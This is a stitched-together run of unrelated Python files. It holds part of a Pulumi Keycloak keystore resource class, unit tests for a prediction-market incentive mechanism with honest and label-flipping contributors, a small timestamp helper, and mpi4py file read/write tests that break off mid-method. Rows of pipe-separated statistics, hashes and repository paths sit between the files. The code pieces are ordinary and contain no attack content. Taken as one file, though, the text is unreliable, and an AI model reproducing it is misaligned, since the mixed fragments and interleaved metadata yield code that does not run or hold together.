        :param pulumi.Input[str] keystore_password: Password for the private key.
        :param pulumi.Input[str] name: Display name of provider when linked in admin console.
        :param pulumi.Input[int] priority: Priority for the provider. Defaults to `0`
        :param pulumi.Input[str] realm_id: The realm this keystore exists in.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: RealmKeystoreJavaGeneratedArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Allows for creating and managing `java-keystore` Realm keystores within Keycloak.
        A realm keystore manages generated key pairs that are used by Keycloak to perform cryptographic signatures and encryption.
        ## Import
        Realm keys can be imported using realm name and keystore id, you can find it in web UI. Example:
        ```sh
        $ pulumi import keycloak:index/realmKeystoreJavaGenerated:RealmKeystoreJavaGenerated java_keystore my-realm/my-realm/618cfba7-49aa-4c09-9a19-2f699b576f0b
        ```
        :param str resource_name: The name of the resource.
        :param RealmKeystoreJavaGeneratedArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Resolve which overload the caller used (args-bag vs. keyword form)
        # and forward to the single real initializer.
        resource_args, opts = _utilities.get_resource_args_opts(RealmKeystoreJavaGeneratedArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 active: Optional[pulumi.Input[bool]] = None,
                 algorithm: Optional[pulumi.Input[str]] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 key_alias: Optional[pulumi.Input[str]] = None,
                 key_password: Optional[pulumi.Input[str]] = None,
                 keystore: Optional[pulumi.Input[str]] = None,
                 keystore_password: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 priority: Optional[pulumi.Input[int]] = None,
                 realm_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: __props__ is reserved for get()-style lookups.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = RealmKeystoreJavaGeneratedArgs.__new__(RealmKeystoreJavaGeneratedArgs)
            __props__.__dict__["active"] = active
            __props__.__dict__["algorithm"] = algorithm
            __props__.__dict__["enabled"] = enabled
            # Required-property checks are skipped when opts.urn is set
            # (the engine is rehydrating an existing resource by URN).
            if key_alias is None and not opts.urn:
                raise TypeError("Missing required property 'key_alias'")
            __props__.__dict__["key_alias"] = key_alias
            if key_password is None and not opts.urn:
                raise TypeError("Missing required property 'key_password'")
            __props__.__dict__["key_password"] = key_password
            if keystore is None and not opts.urn:
                raise TypeError("Missing required property 'keystore'")
            __props__.__dict__["keystore"] = keystore
            if keystore_password is None and not opts.urn:
                raise TypeError("Missing required property 'keystore_password'")
            __props__.__dict__["keystore_password"] = keystore_password
            __props__.__dict__["name"] = name
            __props__.__dict__["priority"] = priority
            if realm_id is None and not opts.urn:
                raise TypeError("Missing required property 'realm_id'")
            __props__.__dict__["realm_id"] = realm_id
        super(RealmKeystoreJavaGenerated, __self__).__init__(
            'keycloak:index/realmKeystoreJavaGenerated:RealmKeystoreJavaGenerated',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            active: Optional[pulumi.Input[bool]] = None,
            algorithm: Optional[pulumi.Input[str]] = None,
            enabled: Optional[pulumi.Input[bool]] = None,
            key_alias: Optional[pulumi.Input[str]] = None,
            key_password: Optional[pulumi.Input[str]] = None,
            keystore: Optional[pulumi.Input[str]] = None,
            keystore_password: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            priority: Optional[pulumi.Input[int]] = None,
            realm_id: Optional[pulumi.Input[str]] = None) -> 'RealmKeystoreJavaGenerated':
        """
        Get an existing RealmKeystoreJavaGenerated resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] active: When `false`, key is not used for signing. Defaults to `true`.
        :param pulumi.Input[str] algorithm: Intended algorithm for the key. Defaults to `RS256`
        :param pulumi.Input[bool] enabled: When `false`, key is not accessible in this realm. Defaults to `true`.
        :param pulumi.Input[str] key_alias: Alias for the private key
        :param pulumi.Input[str] key_password: Password for the private key
        :param pulumi.Input[str] keystore: Path to keys file on keycloak instance.
        :param pulumi.Input[str] keystore_password: Password for the private key.
        :param pulumi.Input[str] name: Display name of provider when linked in admin console.
        :param pulumi.Input[int] priority: Priority for the provider. Defaults to `0`
        :param pulumi.Input[str] realm_id: The realm this keystore exists in.
        """
        # Force opts.id so the base class performs a lookup instead of a create.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _RealmKeystoreJavaGeneratedState.__new__(_RealmKeystoreJavaGeneratedState)
        __props__.__dict__["active"] = active
        __props__.__dict__["algorithm"] = algorithm
        __props__.__dict__["enabled"] = enabled
        __props__.__dict__["key_alias"] = key_alias
        __props__.__dict__["key_password"] = key_password
        __props__.__dict__["keystore"] = keystore
        __props__.__dict__["keystore_password"] = keystore_password
        __props__.__dict__["name"] = name
        __props__.__dict__["priority"] = priority
        __props__.__dict__["realm_id"] = realm_id
        return RealmKeystoreJavaGenerated(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def active(self) -> pulumi.Output[Optional[bool]]:
        """
        When `false`, key is not used for signing. Defaults to `true`.
        """
        return pulumi.get(self, "active")
    @property
    @pulumi.getter
    def algorithm(self) -> pulumi.Output[Optional[str]]:
        """
        Intended algorithm for the key. Defaults to `RS256`
        """
        return pulumi.get(self, "algorithm")
    @property
    @pulumi.getter
    def enabled(self) -> pulumi.Output[Optional[bool]]:
        """
        When `false`, key is not accessible in this realm. Defaults to `true`.
        """
        return pulumi.get(self, "enabled")
    @property
    @pulumi.getter(name="keyAlias")
    def key_alias(self) -> pulumi.Output[str]:
        """
        Alias for the private key
        """
        return pulumi.get(self, "key_alias")
    @property
    @pulumi.getter(name="keyPassword")
    def key_password(self) -> pulumi.Output[str]:
        """
        Password for the private key
        """
        return pulumi.get(self, "key_password")
    @property
    @pulumi.getter
    def keystore(self) -> pulumi.Output[str]:
        """
        Path to keys file on keycloak instance.
        """
        return pulumi.get(self, "keystore")
    @property
    @pulumi.getter(name="keystorePassword")
    def keystore_password(self) -> pulumi.Output[str]:
        """
        Password for the private key.
        """
        return pulumi.get(self, "keystore_password")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Display name of provider when linked in admin console.
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter
    def priority(self) -> pulumi.Output[Optional[int]]:
        """
        Priority for the provider. Defaults to `0`
        """
        return pulumi.get(self, "priority")
    @property
    @pulumi.getter(name="realmId")
    def realm_id(self) -> pulumi.Output[str]:
        """
        The realm this keystore exists in.
        """
        return pulumi.get(self, "realm_id")
| 40.167785 | 162 | 0.629073 | 2,754 | 23,940 | 5.281409 | 0.066812 | 0.101341 | 0.089515 | 0.072602 | 0.860158 | 0.840839 | 0.8154 | 0.782331 | 0.771949 | 0.76418 | 0 | 0.003912 | 0.2632 | 23,940 | 595 | 163 | 40.235294 | 0.820681 | 0.273559 | 0 | 0.738636 | 1 | 0 | 0.08817 | 0.00932 | 0 | 0 | 0 | 0 | 0 | 1 | 0.161932 | false | 0.15625 | 0.014205 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
6fbe2765166180f1fc93227d9d94ae14e74cb772 | 17,762 | py | Python | simulation/decai/simulation/contract/incentive/tests/test_prediction_market.py | boost-entropy-python/0xDeCA10B | fe67c97283a19b83bb5c5616705ed6ff570cdd8f | [
"MIT"
] | 445 | 2019-06-04T16:49:00.000Z | 2022-03-19T02:20:42.000Z | simulation/decai/simulation/contract/incentive/tests/test_prediction_market.py | boost-entropy-python/0xDeCA10B | fe67c97283a19b83bb5c5616705ed6ff570cdd8f | [
"MIT"
] | 51 | 2019-07-20T14:36:10.000Z | 2022-03-07T05:30:50.000Z | simulation/decai/simulation/contract/incentive/tests/test_prediction_market.py | boost-entropy-python/0xDeCA10B | fe67c97283a19b83bb5c5616705ed6ff570cdd8f | [
"MIT"
] | 91 | 2019-07-12T16:23:04.000Z | 2022-03-07T05:25:36.000Z | import unittest
from collections import defaultdict
from typing import cast
from injector import Injector
from decai.simulation.contract.balances import Balances
from decai.simulation.contract.classification.perceptron import PerceptronModule
from decai.simulation.contract.data.data_handler import StoredData
from decai.simulation.contract.incentive.incentive_mechanism import IncentiveMechanism
from decai.simulation.contract.incentive.prediction_market import MarketPhase, \
PredictionMarket, PredictionMarketImModule
from decai.simulation.contract.objects import Msg, TimeMock
from decai.simulation.data.data_loader import DataLoader
from decai.simulation.data.simple_data_loader import SimpleDataModule
from decai.simulation.logging_module import LoggingModule
class TestPredictionMarket(unittest.TestCase):
    def test_market_like_original_paper(self):
        """Run a full prediction-market lifecycle with the original-paper
        options (fixed minimum stake, no grouped contributions, no model
        reset during the reward phase) and assert that the honest
        contributor profits while the label-flipping one loses, with the
        total balance sheet remaining zero-sum.
        """
        inj = Injector([
            SimpleDataModule,
            LoggingModule,
            PerceptronModule,
            PredictionMarketImModule(
                allow_greater_deposit=False,
                group_contributions=False,
                reset_model_during_reward_phase=False,
            ),
        ])
        balances = inj.get(Balances)
        data = inj.get(DataLoader)
        im = cast(PredictionMarket, inj.get(IncentiveMechanism))
        im.owner = 'owner'
        assert isinstance(im, PredictionMarket)
        init_train_data_portion = 0.2
        # Fund the market creator and the two contributors.
        initializer_address = 'initializer'
        total_bounty = 100_000
        balances.initialize(initializer_address, total_bounty)
        good_contributor_address = 'good_contributor'
        initial_good_balance = 10_000
        balances.initialize(good_contributor_address, initial_good_balance)
        bad_contributor_address = 'bad_contributor'
        initial_bad_balance = 10_000
        balances.initialize(bad_contributor_address, initial_bad_balance)
        (x_train, y_train), (x_test, y_test) = data.load_data()
        # First 20% of the training data seeds the initial model; the rest is contributed.
        init_idx = int(len(x_train) * init_train_data_portion)
        assert init_idx > 0
        x_init_data, y_init_data = x_train[:init_idx], y_train[:init_idx]
        x_remaining, y_remaining = x_train[init_idx:], y_train[init_idx:]
        # Split test set into pieces.
        num_pieces = 10
        test_dataset_hashes, test_sets = im.get_test_set_hashes(num_pieces, x_test, y_test)
        # Ending criteria:
        min_length_s = 100
        min_num_contributions = min(len(x_remaining), 100)
        # Commitment Phase
        self.assertIsNone(im.state)
        im.model.init_model(x_init_data, y_init_data, save_model=True)
        # Hashes are committed in two batches to exercise add_test_set_hashes.
        hashes_split = 3
        test_reveal_index = im.initialize_market(Msg(initializer_address, total_bounty),
                                                 test_dataset_hashes[:hashes_split],
                                                 min_length_s, min_num_contributions)
        assert 0 <= test_reveal_index < len(test_dataset_hashes)
        self.assertEqual(MarketPhase.INITIALIZATION, im.state)
        test_reveal_index = im.add_test_set_hashes(Msg(initializer_address, 0), test_dataset_hashes[hashes_split:])
        assert 0 <= test_reveal_index < len(test_dataset_hashes)
        self.assertEqual(MarketPhase.INITIALIZATION, im.state)
        im.reveal_init_test_set(test_sets[test_reveal_index])
        self.assertEqual(MarketPhase.PARTICIPATION, im.state)
        # Participation Phase
        value = 100
        total_deposits = defaultdict(float)
        for i in range(min_num_contributions):
            data = x_remaining[i]
            classification = y_remaining[i]
            if i % 2 == 0:
                contributor = good_contributor_address
            else:
                # The bad contributor submits deliberately flipped labels.
                contributor = bad_contributor_address
                classification = 1 - classification
            cost, _ = im.handle_add_data(contributor, value, data, classification)
            self.assertEqual(im.min_stake, cost, "Cost should be the minimum stake because of the options passed in.")
            balances.send(contributor, im.owner, cost)
            total_deposits[contributor] += cost
        # Reward Phase
        self.assertEqual(MarketPhase.PARTICIPATION, im.state)
        im.end_market()
        self.assertEqual(MarketPhase.REVEAL_TEST_SET, im.state)
        for i, test_set_portion in enumerate(test_sets):
            if i != test_reveal_index:
                im.verify_next_test_set(test_set_portion)
        self.assertEqual(MarketPhase.REWARD_RESTART, im.state)
        while im.remaining_bounty_rounds > 0:
            im.process_contribution()
        # Collect rewards.
        self.assertEqual(MarketPhase.REWARD_COLLECT, im.state)
        for contributor in [good_contributor_address, bad_contributor_address]:
            # Don't need to pass the right StoredData.
            # noinspection PyTypeChecker
            reward = im.handle_refund(contributor, None, 0, False, None)
            balances.send(im.owner, contributor, reward)
        self.assertGreater(total_deposits[good_contributor_address], 0)
        self.assertGreater(total_deposits[bad_contributor_address], 0)
        # General checks that should be true for a market with a reasonably sensitive model.
        self.assertLess(balances[im.owner], total_bounty,
                        f"Some of the bounty should be distributed.\n"
                        f"Balances: {balances.get_all()}")
        self.assertLess(0, balances[im.owner])
        # Sometimes the bad contributor happens to get some value but not much.
        self.assertAlmostEqual(balances[bad_contributor_address], initial_bad_balance, delta=2,
                               msg=f"The bad contributor should lose funds.\n"
                                   f"Balances: {balances.get_all()}")
        self.assertGreater(balances[good_contributor_address], initial_good_balance)
        self.assertLess(balances[bad_contributor_address], balances[good_contributor_address])
        self.assertLessEqual(balances[good_contributor_address] - balances[bad_contributor_address],
                             total_bounty)
        self.assertEqual(initial_good_balance + initial_bad_balance + total_bounty,
                         balances[good_contributor_address] + balances[bad_contributor_address] +
                         balances[im.owner],
                         "Should be a zero-sum.")
def test_market(self):
inj = Injector([
SimpleDataModule,
LoggingModule,
PerceptronModule,
PredictionMarketImModule(
allow_greater_deposit=True,
group_contributions=True,
reset_model_during_reward_phase=True,
),
])
balances = inj.get(Balances)
data = inj.get(DataLoader)
im = cast(PredictionMarket, inj.get(IncentiveMechanism))
im.owner = 'owner'
assert isinstance(im, PredictionMarket)
init_train_data_portion = 0.2
initializer_address = 'initializer'
total_bounty = 100_000
balances.initialize(initializer_address, total_bounty)
good_contributor_address = 'good_contributor'
initial_good_balance = 10_000
balances.initialize(good_contributor_address, initial_good_balance)
bad_contributor_address = 'bad_contributor'
initial_bad_balance = 10_000
balances.initialize(bad_contributor_address, initial_bad_balance)
(x_train, y_train), (x_test, y_test) = data.load_data()
init_idx = int(len(x_train) * init_train_data_portion)
assert init_idx > 0
x_init_data, y_init_data = x_train[:init_idx], y_train[:init_idx]
x_remaining, y_remaining = x_train[init_idx:], y_train[init_idx:]
# Split test set into pieces.
num_pieces = 10
test_dataset_hashes, test_sets = im.get_test_set_hashes(num_pieces, x_test, y_test)
# Ending criteria:
min_length_s = 100
min_num_contributions = min(len(x_remaining), 100)
# Commitment Phase
self.assertIsNone(im.state)
im.model.init_model(x_init_data, y_init_data, save_model=True)
hashes_split = 3
test_reveal_index = im.initialize_market(Msg(initializer_address, total_bounty),
test_dataset_hashes[:hashes_split],
min_length_s, min_num_contributions)
assert 0 <= test_reveal_index < len(test_dataset_hashes)
self.assertEqual(MarketPhase.INITIALIZATION, im.state)
test_reveal_index = im.add_test_set_hashes(Msg(initializer_address, 0), test_dataset_hashes[hashes_split:])
assert 0 <= test_reveal_index < len(test_dataset_hashes)
self.assertEqual(MarketPhase.INITIALIZATION, im.state)
im.reveal_init_test_set(test_sets[test_reveal_index])
self.assertEqual(MarketPhase.PARTICIPATION, im.state)
# Participation Phase
value = 100
total_deposits = defaultdict(float)
for i in range(min_num_contributions):
data = x_remaining[i]
classification = y_remaining[i]
if i % 2 == 0:
contributor = good_contributor_address
else:
contributor = bad_contributor_address
classification = 1 - classification
cost, _ = im.handle_add_data(contributor, value, data, classification)
balances.send(contributor, im.owner, cost)
total_deposits[contributor] += cost
# Reward Phase
self.assertEqual(MarketPhase.PARTICIPATION, im.state)
im.end_market()
self.assertEqual(MarketPhase.REVEAL_TEST_SET, im.state)
for i, test_set_portion in enumerate(test_sets):
if i != test_reveal_index:
im.verify_next_test_set(test_set_portion)
self.assertEqual(MarketPhase.REWARD_RESTART, im.state)
while im.remaining_bounty_rounds > 0:
im.process_contribution()
# Collect rewards.
self.assertEqual(MarketPhase.REWARD_COLLECT, im.state)
for contributor in [good_contributor_address, bad_contributor_address]:
# Don't need to pass the right StoredData.
# noinspection PyTypeChecker
reward = im.handle_refund(contributor, None, 0, False, None)
balances.send(im.owner, contributor, reward)
self.assertGreater(total_deposits[good_contributor_address], 0)
self.assertGreater(total_deposits[bad_contributor_address], 0)
# General checks that should be true for a market with a reasonably sensitive model.
self.assertLess(balances[im.owner], total_bounty,
f"Some of the bounty should be distributed.\n"
f"Balances: {balances.get_all()}")
self.assertLess(0, balances[im.owner])
self.assertLess(balances[bad_contributor_address], initial_bad_balance)
self.assertGreater(balances[good_contributor_address], initial_good_balance)
self.assertLess(balances[bad_contributor_address], balances[good_contributor_address])
self.assertLessEqual(balances[good_contributor_address] - balances[bad_contributor_address],
total_bounty)
self.assertEqual(initial_good_balance + initial_bad_balance + total_bounty,
balances[good_contributor_address] + balances[bad_contributor_address] +
balances[im.owner],
"Should be a zero-sum.")
self.assertEqual(initial_bad_balance - total_deposits[bad_contributor_address],
balances[bad_contributor_address],
"The bad contributor should lose all of their deposits.")
def test_report(self):
inj = Injector([
SimpleDataModule,
LoggingModule,
PerceptronModule,
PredictionMarketImModule(
allow_greater_deposit=True,
group_contributions=True,
reset_model_during_reward_phase=True,
),
])
balances = inj.get(Balances)
data = inj.get(DataLoader)
im = cast(PredictionMarket, inj.get(IncentiveMechanism))
im.owner = 'owner'
time_method = inj.get(TimeMock)
assert isinstance(im, PredictionMarket)
init_train_data_portion = 0.2
initializer_address = 'initializer'
total_bounty = 100_000
balances.initialize(initializer_address, total_bounty)
good_contributor_address = 'good_contributor'
initial_good_balance = 10_000
balances.initialize(good_contributor_address, initial_good_balance)
bad_contributor_address = 'bad_contributor'
initial_bad_balance = 10_000
balances.initialize(bad_contributor_address, initial_bad_balance)
(x_train, y_train), (x_test, y_test) = data.load_data()
init_idx = int(len(x_train) * init_train_data_portion)
assert init_idx > 0
x_init_data, y_init_data = x_train[:init_idx], y_train[:init_idx]
x_remaining, y_remaining = x_train[init_idx:], y_train[init_idx:]
# Split test set into pieces.
num_pieces = 10
test_dataset_hashes, test_sets = im.get_test_set_hashes(num_pieces, x_test, y_test)
# Ending criteria:
min_length_s = 100
min_num_contributions = min(len(x_remaining), 100)
# Commitment Phase
self.assertIsNone(im.state)
im.model.init_model(x_init_data, y_init_data, save_model=True)
test_reveal_index = im.initialize_market(Msg(initializer_address, total_bounty),
test_dataset_hashes,
min_length_s, min_num_contributions)
self.assertEqual(MarketPhase.INITIALIZATION, im.state)
assert 0 <= test_reveal_index < len(test_dataset_hashes)
im.reveal_init_test_set(test_sets[test_reveal_index])
self.assertEqual(MarketPhase.PARTICIPATION, im.state)
# Participation Phase
value = 100
total_deposits = defaultdict(float)
stored_data = None
for i in range(min_num_contributions):
time_method.add_time(60)
data = x_remaining[i]
classification = y_remaining[i]
if i % 2 == 0:
contributor = good_contributor_address
else:
contributor = bad_contributor_address
classification = 1 - classification
cost, _ = im.handle_add_data(contributor, value, data, classification)
if stored_data is None:
stored_data = StoredData(classification, time_method(), contributor, cost, cost)
balances.send(contributor, im.owner, cost)
total_deposits[contributor] += cost
# Reward Phase
self.assertEqual(MarketPhase.PARTICIPATION, im.state)
im.end_market()
time_method.add_time(60)
self.assertEqual(MarketPhase.REVEAL_TEST_SET, im.state)
for i, test_set_portion in enumerate(test_sets):
if i != test_reveal_index:
im.verify_next_test_set(test_set_portion)
self.assertEqual(MarketPhase.REWARD_RESTART, im.state)
while im.remaining_bounty_rounds > 0:
time_method.add_time(60)
im.process_contribution()
# Collect rewards.
self.assertEqual(MarketPhase.REWARD_COLLECT, im.state)
# Get some stored data.
# Make sure reporting doesn't work yet.
reward = im.handle_report(bad_contributor_address, stored_data, False, None)
self.assertEqual(0, reward, "There should be no reward yet.")
time_method.add_time(im.any_address_claim_wait_time_s)
reward = im.handle_report(bad_contributor_address, stored_data, False, None)
balances.send(im.owner, bad_contributor_address, reward)
# Don't need to pass the right StoredData.
# noinspection PyTypeChecker
reward = im.handle_refund(bad_contributor_address, None, 0, False, None)
balances.send(im.owner, bad_contributor_address, reward)
# General checks that should be true for a market with a reasonably sensitive model.
self.assertLess(balances[im.owner], total_bounty,
f"Some of the bounty should be distributed.\n"
f"Balances: {balances.get_all()}")
self.assertLess(0, balances[im.owner])
self.assertGreater(total_deposits[good_contributor_address], 0)
self.assertGreater(total_deposits[bad_contributor_address], 0)
# The bad contributor profited because they reported the good contributor.
self.assertGreater(balances[bad_contributor_address], initial_bad_balance)
self.assertLess(balances[good_contributor_address], initial_good_balance)
self.assertLess(balances[good_contributor_address], balances[bad_contributor_address])
self.assertLessEqual(balances[bad_contributor_address] - balances[good_contributor_address],
total_bounty)
self.assertEqual(initial_good_balance + initial_bad_balance + total_bounty,
balances[good_contributor_address] + balances[bad_contributor_address] +
balances[im.owner],
"Should be a zero-sum.")
self.assertEqual(initial_good_balance - total_deposits[good_contributor_address],
balances[good_contributor_address],
"The good contributor should lose all of their deposits.")
| 44.18408 | 118 | 0.660173 | 1,984 | 17,762 | 5.606351 | 0.101815 | 0.098714 | 0.062303 | 0.033894 | 0.885193 | 0.862537 | 0.846265 | 0.829363 | 0.812011 | 0.808235 | 0 | 0.010057 | 0.266637 | 17,762 | 401 | 119 | 44.294264 | 0.843851 | 0.055793 | 0 | 0.855705 | 0 | 0 | 0.041699 | 0 | 0 | 0 | 0 | 0 | 0.218121 | 1 | 0.010067 | false | 0.003356 | 0.043624 | 0 | 0.057047 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d2445a7df4c449d3406dba05176b76b35018d199 | 114 | py | Python | indifferent/util.py | LandRegistry/audit | f0404195b0c90d5f96c4ce523ac8a179a1b479d5 | [
"MIT"
] | null | null | null | indifferent/util.py | LandRegistry/audit | f0404195b0c90d5f96c4ce523ac8a179a1b479d5 | [
"MIT"
] | null | null | null | indifferent/util.py | LandRegistry/audit | f0404195b0c90d5f96c4ce523ac8a179a1b479d5 | [
"MIT"
] | null | null | null | import calendar
import datetime
def unixts():
return calendar.timegm(datetime.datetime.utcnow().timetuple())
| 19 | 66 | 0.77193 | 13 | 114 | 6.769231 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114035 | 114 | 5 | 67 | 22.8 | 0.871287 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
d274d3dfcf0ad105857beb5b560a9a2e5a86cfd5 | 15,320 | py | Python | Design/PythonMpi/repo/test/test_io.py | PascalSun/MIT-year2 | a48dd89f592941efd09c1d251a3ef113e95a6af3 | [
"MIT"
] | null | null | null | Design/PythonMpi/repo/test/test_io.py | PascalSun/MIT-year2 | a48dd89f592941efd09c1d251a3ef113e95a6af3 | [
"MIT"
] | null | null | null | Design/PythonMpi/repo/test/test_io.py | PascalSun/MIT-year2 | a48dd89f592941efd09c1d251a3ef113e95a6af3 | [
"MIT"
] | null | null | null | from mpi4py import MPI
import mpiunittest as unittest
import arrayimpl
import os, tempfile
class BaseTestIO(object):
COMM = MPI.COMM_NULL
FILE = MPI.FILE_NULL
prefix = 'mpi4py-'
def setUp(self):
comm = self.COMM
fname = None
if comm.Get_rank() == 0:
fd, fname = tempfile.mkstemp(prefix=self.prefix)
os.close(fd)
fname = comm.bcast(fname, 0)
amode = MPI.MODE_RDWR | MPI.MODE_CREATE
amode |= MPI.MODE_DELETE_ON_CLOSE
amode |= MPI.MODE_UNIQUE_OPEN
info = MPI.INFO_NULL
try:
self.FILE = MPI.File.Open(comm, fname, amode, info)
except Exception:
if comm.Get_rank() == 0:
os.remove(fname)
raise
def tearDown(self):
if self.FILE:
self.FILE.Close()
self.COMM.Barrier()
# non-collective
def testReadWriteAt(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Write_at(count*rank, wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Read_at(count*rank, rbuf.as_mpi_c(count))
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testIReadIWriteAt(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Iwrite_at(count*rank, wbuf.as_raw()).Wait()
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Iread_at(count*rank, rbuf.as_mpi_c(count)).Wait()
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testReadWrite(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
for r in range(size):
if r == rank:
fh.Seek(0, MPI.SEEK_SET)
fh.Write(wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
for n in range(0, len(wbuf)):
rbuf = array(-1, typecode, n+1)
fh.Seek(0, MPI.SEEK_SET)
fh.Read(rbuf.as_mpi_c(n))
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testIReadIWrite(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
for r in range(size):
if r == rank:
fh.Seek(0, MPI.SEEK_SET)
fh.Iwrite(wbuf.as_raw()).Wait()
fh.Sync()
comm.Barrier()
fh.Sync()
for n in range(0, len(wbuf)):
rbuf = array(-1, typecode, n+1)
fh.Seek(0, MPI.SEEK_SET)
fh.Iread(rbuf.as_mpi_c(n)).Wait()
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testReadWriteShared(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(rank%42, typecode, count)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Write_shared(wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Read_shared(rbuf.as_mpi_c(count))
for value in rbuf[:-1]:
self.assertTrue(0<=value<42)
self.assertEqual(value, rbuf[0])
self.assertEqual(rbuf[-1], -1)
def testIReadIWriteShared(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(rank%42, typecode, count)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Iwrite_shared(wbuf.as_raw()).Wait()
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Iread_shared(rbuf.as_mpi_c(count)).Wait()
for value in rbuf[:-1]:
self.assertTrue(0<=value<42)
self.assertEqual(value, rbuf[0])
self.assertEqual(rbuf[-1], -1)
# collective
def testReadWriteAtAll(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Write_at_all(count*rank, wbuf.as_raw())
fh.Sync()
comm.Barrier()
